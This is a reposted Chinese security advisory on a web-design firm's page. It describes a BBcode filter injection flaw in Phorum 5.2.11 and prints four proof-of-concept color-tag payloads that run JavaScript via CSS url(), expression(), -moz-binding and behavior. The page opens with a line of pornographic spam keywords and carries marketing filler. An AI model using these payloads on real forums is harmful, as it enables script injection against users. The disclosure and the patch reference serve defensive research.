免费色情毛片一级av黄,日本久久久久黄色

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

Phorum過濾引擎HTML代碼注入漏洞

影響版本: Phorum 5.2.11

成都創(chuàng)新互聯(lián)專注于企業(yè)全網(wǎng)整合營銷推廣、網(wǎng)站重做改版、大新網(wǎng)站定制設(shè)計(jì)、自適應(yīng)品牌網(wǎng)站建設(shè)、H5開發(fā)、成都商城網(wǎng)站開發(fā)、集團(tuán)公司官網(wǎng)建設(shè)、外貿(mào)營銷網(wǎng)站建設(shè)、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁設(shè)計(jì)等建站業(yè)務(wù)，價(jià)格優(yōu)惠性價(jià)比高，為大新等各大城市提供網(wǎng)站開發(fā)制作服務(wù)。

漏洞描述: BUGTRAQ: 35777

Phorum是一款基于PHP的WEB論壇程序，可在Linux和Unix操作系統(tǒng)下使用，也可在Microsoft Windows操作系統(tǒng)下使用。 Phorum的過濾引擎沒有充分地驗(yàn)證某些BBcode參數(shù)，遠(yuǎn)程攻擊者可以在所提交的請(qǐng)求中使用導(dǎo)致注入并執(zhí)行惡意JavaScript代碼。<*參考 crashfr （crashfr@sysdream.com）http://milw0rm.com/exploits/9231 http://secunia.com/advisories/35928/ *>

測試方法: [www.sebug.net]

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!

[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG

安全建議: 廠商補(bǔ)丁： Phorum

目前廠商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問題。

請(qǐng)到廠商的主頁下載： http://www.phorum.org/phorum5/read.php?64,139411

【編輯推薦】

Macromedia ColdFusion日志條目HTML注入漏洞
多家廠商的web漏洞掃描程序存在HTML注入漏洞
Rockliffe 郵件信息HTML注入漏洞

當(dāng)前文章：Phorum過濾引擎HTML代碼注入漏洞
文章轉(zhuǎn)載：http://www.5511xx.com/article/cdoddie.html

新聞中心

其他資訊